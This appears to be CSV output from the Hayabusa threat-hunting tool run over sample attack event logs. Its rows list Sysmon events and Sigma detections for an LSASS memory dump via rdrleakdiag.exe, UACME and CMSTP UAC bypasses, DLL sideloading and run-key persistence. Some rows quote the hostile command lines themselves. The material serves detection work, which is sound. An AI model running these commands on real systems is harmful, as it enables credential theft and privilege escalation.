2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,"Cmd: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap | Process: C:\Windows\System32\rdrleakdiag.exe | User: DESKTOP-PIU87N6\wanwan | Parent Cmd: ""C:\WINDOWS\system32\cmd.exe"" | LID: 0x30b90 | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,Evas,RdrLeakDiag Process Dump,,rules/sigma/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,CredAccess,Process Dump via RdrLeakDiag.exe,,rules/sigma/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.206 +09:00,DESKTOP-PIU87N6,8,medium,,Process Injection,Src Process: C:\Windows\System32\rdrleakdiag.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 3352 | Src PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01 | Tgt PID: 668 | Tgt PGUID: BC47D85C-FAA9-5F68-0000-0010D9590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,Cmd: C:\WINDOWS\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\lsass.exe | LID: 0x3e7 | PID: 7468 | PGUID: BC47D85C-DB68-5F71-0000-00109138AB01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,CredAccess,Suspicious LSASS Process Clone,,rules/sigma/process_creation/proc_creation_win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.630 +09:00,DESKTOP-PIU87N6,11,info,,File Created,Path: C:\Users\wanwan\Desktop\minidump_668.dmp | Process: C:\WINDOWS\system32\rdrleakdiag.exe | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: POC.exe | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x5a873 | PID: 4696 | PGUID: 747F3D96-2156-5F76-0000-0010DBE82500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: Program | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: POC.exe | LID: 0x5a873 | PID: 5448 | PGUID: 747F3D96-2156-5F76-0000-00100EEC2500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.775 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\abc.txt | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 6932 | PGUID: 747F3D96-1903-5F76-0000-0010B85E0900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\mmc.exe"" WF.msc | LID: 0x391e334 | PID: 12876 | PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Windows\System32\mmc.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 20228 | Src PGUID: 00247C92-9E03-5F7B-0000-0010A645272C | Tgt PID: 12876 | Tgt PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
2020-10-07 07:11:17.572 +09:00,02694w-win10.threebeesco.com,18,info,,Pipe Connected,\winreg | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,Exec | Persis,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,Exec | Persis,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64037 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.143:49920 (02694w-win10.threebeesco.com) | Dst: 172.16.66.36:49670 (01566S-WIN16-IR) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\lsass.exe | PID: 632 | PGUID: 6A3C3EF2-E698-5F7C-0000-00103C790000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-07 07:11:18.930 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64038 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 6372 | PGUID: 00247C92-09FE-5F86-0000-0010AC861401,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 7648 | PGUID: 00247C92-09FE-5F86-0000-0010AD861401,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\smartscreen.exe -Embedding | Process: C:\Windows\System32\smartscreen.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8d824 | PID: 2656 | PGUID: 747F3D96-4BCE-5F88-0000-00103F464D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,Persis,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\tendyron.exe"" | LID: 0x8d824 | PID: 6392 | PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.738 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.764 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.765 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xa0a10 | PID: 3660 | PGUID: 747F3D96-D8DF-5F8A-0000-0010572F7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0xa09d1 | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:33.449 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\wwlib.dll | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | LID: 0xa09d1 | PID: 2920 | PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 840 | PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
